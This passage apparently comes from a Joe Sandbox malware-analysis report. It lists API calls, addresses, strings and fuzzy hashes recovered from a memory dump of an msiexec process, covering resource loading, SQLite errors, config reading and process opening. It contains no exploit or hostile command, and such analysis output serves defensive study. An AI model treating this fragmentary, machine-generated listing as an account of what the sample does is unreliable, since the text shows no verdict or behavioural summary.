                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                    • String ID: %s (%s)$YV@
                                                                                                    • API String ID: 3979103747-598926743
                                                                                                    • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                    • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                    • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                    • String ID: AE$BIN
                                                                                                    • API String ID: 1668488027-3931574542
                                                                                                    • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                    • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                    • API String ID: 2767993716-572158859
                                                                                                    • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                    • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                    • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                    • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                    • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                    • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                    • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                    • String ID: ($d
                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                    • Opcode ID: 0995057b6bf188cfe0fc49dae3d639772c63281887a4852e40069e498b89dc5f
                                                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                    • Opcode Fuzzy Hash: 0995057b6bf188cfe0fc49dae3d639772c63281887a4852e40069e498b89dc5f
                                                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                    APIs
                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3015003838-0
                                                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00407E44
                                                                                                    • memset.MSVCRT ref: 00407E5B
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 59245283-0
                                                                                                    • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                    • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                    APIs
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                    • memset.MSVCRT ref: 00413ADC
                                                                                                    • memset.MSVCRT ref: 00413AEC
                                                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                    • memset.MSVCRT ref: 00413BD7
                                                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                    • String ID: 3A
                                                                                                    • API String ID: 3300951397-293699754
                                                                                                    • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                    • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                    • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                    • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                    • String ID: strings
                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                    • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                    • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041249C
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                    • wcscpy.MSVCRT ref: 004125A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                    • String ID: r!A
                                                                                                    • API String ID: 2791114272-628097481
                                                                                                    • Opcode ID: a1029283d1783dcc6be2830c0b5af2bb8bc6b16ea9a96fe8d974539b3d9e2e59
                                                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                    • Opcode Fuzzy Hash: a1029283d1783dcc6be2830c0b5af2bb8bc6b16ea9a96fe8d974539b3d9e2e59
                                                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00411AF6
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                    • String ID: AE$.cfg$General$EA
                                                                                                    • API String ID: 776488737-1622828088
                                                                                                    • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                    • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                    • String ID: sysdatetimepick32
                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                    • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                    • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
